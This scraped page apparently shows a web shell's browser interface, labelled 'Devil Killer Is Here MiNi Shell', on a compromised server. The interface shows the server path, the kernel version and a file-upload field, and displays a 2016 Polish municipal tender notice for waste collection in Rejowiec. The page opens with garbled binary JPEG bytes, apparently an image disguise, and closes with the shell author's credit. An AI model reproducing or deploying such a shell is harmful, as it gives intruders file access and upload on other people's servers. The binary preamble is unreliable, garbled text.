JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160516/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160516/122196-N-2016.html

<p class="kh_header"><b>Rejowiec: Odbieranie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Rejowiec</b><br>
<b>Numer ogłoszenia: 122196 - 2016; data zamieszczenia: 16.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rejowiec , ul. Wiktoryna Zaleskiego 1, 22-360 Rejowiec, woj. lubelskie, tel. 82 5688159, faks 82 5688753.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ugrejowiec.bip.e-zeto.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Gminy Rejowiec.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie usług polegających na: 
1.1 Odbiorze odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie gminy Rejowiec. 
1.2 Zapewnienie właścicielom nieruchomości worków na zmieszane odpady komunalne na  warunkach opisanych w specyfikacji. 
1.3 Zapewnienie właścicielom nieruchomości worków na odpady segregowane na warunkach opisanych w specyfikacji.
1.4 Transport i zagospodarowanie odpadów zmieszanych do istniejącej Regionalnej Instalacji Przetwarzania Odpadów Komunalnych w Srebrzyszczu
1.5 Transport odpadów selektywnie zebranych do istniejącej Instalacji Przetwarzania` Odpadów Komunalnych  KRAS -EKO Sp. z o.o. w Wincentowie. 2. Usługa odbierania odpadów komunalnych (w systemie bezpośrednim) od właścicieli nieruchomości zamieszkałych obejmuje następujące odpady: 
2.1 Niesegregowane (zmieszane) odpady komunalne w tym popiół 
2.2 Selektywnie zbierane odpady: papier i tektura, szkło, tworzywa sztuczne,  metal
i opakowania wielomateriałowe, wielkogabarytowe.
2.3 Odpady zmieszane z przestrzeni publicznej z przystanków autobusowych, cmentarza.
3. W zakresie odbierania odpadów komunalnych Wykonawcę obowiązuje: 
3.1 Odbieranie wszystkich niesegregowanych (zmieszanych) odpadów komunalnych 
i odpadów selektywnie zbieranych, nie dopuszczając do zmieszania poszczególnych 
rodzajów odpadów, bez względu na warunki atmosferyczne. W przypadku stwierdzenia niewłaściwej segregacji Wykonawca przyjmuje odpady jako zmieszane. 
3.2 Niezwłoczne przekazywanie zamawiającemu informacji o niezgodnym z Regulaminem utrzymania czystości i porządku na terenie Gminy Rejowiec gromadzeniu odpadów, w szczególności ich mieszania. 
3.3 Bieżące przekazywanie adresów nieruchomości na których zamieszkują mieszkańcy, na których powstały odpady, a nie zostali ujęci w bazie danych prowadzących przez Zamawiającego. Informację tą Wykonawca przekazuje Zamawiającemu drogą elektroniczną w terminie 7 dni od daty stwierdzenia tego faktu. 
3.4 Sprzątanie terenu po opróżnieniu pojemników, w przypadku rozsypania się odpadów podczas załadunku jak również w sytuacji przepełnienia pojemników w zabudowie wielolokalowej oraz cmentarza w obrębie miejsca ustawienia pojemników. 
4. W zakresie transportu odpadów wymaga się, aby: 
4.1 Wykonawca przestrzegał zakazu mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi od właścicieli nieruchomości. 
4.2 Wykonawca przestrzegał zakazu mieszania ze sobą poszczególnych frakcji selektywnie zebranych odpadów komunalnych. 
4.3 Wykonawca przestrzegał zakazu odbierania odpadów komunalnych od właścicieli 
nieruchomości wspólnie z jakimikolwiek innymi odpadami pochodzącymi od właścicieli nieruchomości niezamieszkałych lub z innych gmin.  
4.4 Wykonawca przestrzegał zabezpieczenia przewożonych odpadów przed rozwiewaniem, wysypaniem na drogę. 
4.5 Wykonawca odbiera odpady z pojemników/worków wystawionych przed posesję przy drodze publicznej.
4.6 Wykonawca dostarcza ww. odpady komunalne do instalacji przetwarzania odpadów wskazanych w opisie zamówienia. Fakt dostarczenia udokumentowany zostanie poprzez przedstawienie zamawiającemu raz w miesiącu dokumentów potwierdzających odebranie odpadów. Karta przekazania odpadów przedkładana będzie w formie kopii potwierdzonej za zgodność z oryginałem. Koszt związany z zagospodarowaniem odpadów zmieszanych ponosi Wykonawca. 
4.7 Wykonawca dostosował wielkości i rodzaj samochodów odbierających odpady do rodzaju odbieranych odpadów oraz terenu, z którego będą one odbierane.
4.8 Długość tras odbioru odpadów opracuje we własnym zakresie Wykonawca, na podstawie ramowego harmonogramu wywozu odpadów.  Harmonogram odbioru opracuje Wykonawca i dostarczy Zamawiającemu, jak i właścicielom nieruchomości przed rozpoczęciem realizacji zadania raz w roku. Opracowany harmonogram odbioru odpadów Wykonawca zamieści na własnej stronie internetowej oraz przekaże Zamawiającemu do zamieszczenia na stronie Urzędu. 
4.9 Odbieranie i transport odpadów z nieruchomości położonych w Gminie Rejowiec, 
na których zamieszkują mieszkańcy, wykonywany był w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania, zgodnie z zapisami ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz. 391 z późn. zm.) oraz zgodnie z obowiązującym w czasie trwania umowy Regulaminem utrzymania czystości i porządku na terenie Gminy Rejowiec zatwierdzonym, Uchwałą Rady w sprawie sposobu i zakresu świadczeń usług w zakresie zagospodarowania i odbierania odpadów komunalnych od właścicieli nieruchomości
4.10 Dokonywanie odbioru i transportu odpadów również w przypadkach kiedy dojazd do punktów zbiórki odpadów komunalnych będzie utrudniony z powodu remontu drogi, dojazdu. W takim przypadku Wykonawcy nie przysługuje roszczenie z tytułu wzrostu kosztów realizacji przedmiotu umowy. 
4.11 Wykonawca przedkładał Zamawiającemu: 
a) raz w miesiącu karty przekazania odpadów w formie kopii potwierdzonej za zgodność z oryginałem, potwierdzające przekazanie odpadów komunalnych wraz z informacją o ilości przekazanych śmieci wyrażonych w Mg, 
b) przez okres trwania umowy Wykonawca będzie sporządzał sprawozdania kwartalne -zgodnie z wzorem z rozporządzenia Ministra Środowiska z dnia 15 maja 2012r. (Dz. U. z 2012 r. poz. 630) i przekazywał Zamawiającemu w terminie do końca miesiąca następującego po kwartale, którego dotyczy, 
c) raz w miesiącu Wykonawca będzie przedkładał zestawienie nieruchomości, które nie były zamieszczone w wykazie, a z których zostały odebrane odpady komunalne wraz z podaniem ilości i pojemności worków/pojemników oraz zestawienie nieruchomości, z których zaprzestano odbierania odpadów komunalnych. 
Zamawiający w dniu podpisania umowy na odbieranie odpadów komunalnych przekaże Zamawiającemu szczegółowy wykaz nieruchomości, z których będą odbierane odpady komunalne.
5. Wymagania w zakresie zapewnienia mieszkańcom worków na odpady komunalne. 
5.1 Odpady komunalne będą gromadzone w pojemnikach oraz workach. Wykonawca w ramach usługi będzie zobowiązany do zabezpieczenia właścicielowi zabudowy jednorodzinnej i zagrodowej po jednym komplecie worków miesięcznie do gromadzenia odpadów komunalnych. Pierwszy komplet worków do gromadzenia odpadów komunalnych  należy dostarczyć przed dniem 1 lipca 2016 r.
Dopuszcza się możliwość gromadzenia odpadów komunalnych w pojemnikach. W tym przypadku, właściciel nieruchomości we własnym zakresie zapewni wyposażenie swojej nieruchomości w pojemniki. 
5.2 System pojemnikowy obowiązywał będzie na obszarze zabudowy wielorodzinnej. 
Pojemniki przeznaczone do gromadzenia odpadów komunalnych zabezpiecza zarządca nieruchomości. 
Utrzymywanie pojemników w odpowiednim stanie sanitarnym i porządkowym - oznacza ich mycie i dezynfekcję co najmniej 2 raz w roku (4 razy w okresie realizacji zamówienia) należy do obowiązków Wykonawcy. Jeżeli w czasie realizacji zamówienia nastąpi uszkodzenie lub zniszczenie pojemników wynikłe z winy Wykonawcy, ich naprawienie i doprowadzenie do stanu poprzedniego należy do Wykonawcy. 
5.3 Rodzaje pojemników, worków do gromadzenia odpadów: 
a) pojemniki o pojemności -110 l, 120 l, 240 l, 1100 l, Kp-7 - 7000 l,
b) worki foliowe o pojemności  120l. 
Prognozowana liczba worków ogółem do gromadzenia odpadów:
worki 120 l - x 2 lata = 63360 x 2 lata = 126720(1760 umów x3 szt.worków=5280 miesięcznie ilość worków}
6. Wymagania w zakresie odbierania odpadów komunalnych dla zabudowy zagrodowej i jednorodzinnej. Na terenie zabudowy zagrodowej i jednorodzinnej obowiązywał będzie system pojemnikowo/workowy zbiórki odpadów komunalnych. 
Wprowadza się następujące rodzaje worków: worki foliowe wykonane z folii polietylenowej o pojemności   120 l, o grubości wykluczającej rozerwanie się. 
Częstotliwość odbioru przez Wykonawcę odpadów - raz w miesiącu zabudowa jednorodzinna i zagrodowa, cztery razy w miesiącu zabudowa wielorodzinna.
Wprowadza się następującą kolorystykę worków: a) zielony - SZKŁO b) żółty - PLASTIK I ODPADY IWELOMATERIAŁOWE  c) czarny - ODPADY ZMIESZANE
Wykonawca odbiera worki z odpadami (pojemniki) wystawione z nieruchomości przed posesję w odległości max. 15 m od drogi publicznej z miejsca umożliwiającego odbiór samochodem przystosowanym do odbioru odpadów. 
Uzupełnianie worków do zbierania odpadów komunalnych następuje po każdorazowym odbiorze poprzez pozostawienie jednego kompletu worków bez względu na ilość odebranych odpadów.
6.1 Wymagania w zakresie odbierania odpadów komunalnych dla zabudowy wielorodzinnej Na terenie zabudowy wielorodzinnej obowiązywał będzie system pojemnikowy zbiórki odpadów komunalnych. 
Odpady komunalne gromadzone będą w pojemnikach ustawionych w dotychczasowych, przeznaczonych do tego miejscach. Niezbędną ilość pojemników zapewni zarządca nieruchomości pojemniki 1100 l, Kp-7. Odbiór odpadów odbywał się będzie 4 razy w miesiącu. Odpady z miejsc przestrzeni publicznej: - przystanki komunikacji publicznej - kosze uliczne o pojemności 30 l stacjonarne szt. 50, cmentarz parafialny pojemniki Kp-7. Częstotliwość odbioru raz w tygodniu chyba, że warunki w trakcie realizacji zamówienia będą wskazywać na zmianę częstotliwości, wówczas należy dokonać uzgodnień z Zamawiającym.
6.2 Harmonogram odbioru odpadów 
1) Wykonawca zobowiązany jest do opracowania harmonogramu odbierania odpadów
2) harmonogram obejmujący okres od 01 czerwca 2016 r. do 31 maja 2018 r. powinien 
zostać opracowany i przedłożony Zamawiającemu przed terminem podpisania umowy 
z podziałem na okresy roczne - 2016 - 2018
3) Harmonogram powinien być sporządzony zgodnie z następującymi wytycznymi: 
a) odbiór odpadów, które odbierane są co najmniej raz na tydzień z danej nieruchomości, powinien przypadać na ten sam dzień tygodnia lub dni tygodnia), 
b) odbiór odpadów, które odbierane są raz w miesiącu powinien zostać ustalony dla odpadów zmieszanych na inny termin niż termin odbioru odpadów selektywnie zebranych.
4) Opracowany harmonogram odbioru odpadów Wykonawca zamieści na własnej stronie internetowej oraz przekaże Zamawiającemu do zamieszczenia na stronie Urzędu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiajacy dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnieniu warunków udziału w postepowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy o posiadanych uprawnieniach do wykonywania zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz sprzętu niezbędnego do realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku odbędzie sie na zasadzie spełnia/ nie spełnia na podstawie przedstawionego oświadczenia wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku odbedzie sie na zasadzie spełnia/nie spełnia na podstawie przedstawionego oświadczenia wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - kryterium społeczne - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, to zgodnie z art. 145 ustawy Prawo zamówień publicznych, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.  W przypadku wszczęcia postępowania odwoławczego zawarcie umowy uzależnia się od wyników tego postępowania. 
Umowa winna zawierać jako obowiązujące wszystkie postanowienia projektu umowy stanowiącej załącznik nr 6 do specyfikacji oraz wszystkie postanowienia z postępowania przetargowego.

              XVIII. Możliwe zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy oraz warunki tych zmian. 
Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość 
dokonania zmian postanowień zawartej umowy w stosunku do treści oferty w sposób 
następujący: 
1. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści 
oferty Wykonawcy w zakresie : 
a) zmiany podwykonawcy za zgodą Zamawiającego, 
b) zmiany wprowadzanej przez Zamawiającego nie wykraczającej poza przedmiot zamówienia. 
2. Wprowadzenia zmian w stosunku do Opisu Przedmiotu Zamówienia w zakresie wykonania prac nie wykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności zwiększenia usprawnienia procesu realizacji zamówienia,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ugrejowiec.bip.e-zeto.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy w Rejowcu, ul. Wiktoryna Zaleskiego 1  22-360 Rejowiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2016 godzina 10:00, miejsce: Urząd Gminy w Rejowcu, ul. Wiktoryna Zaleskiego 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com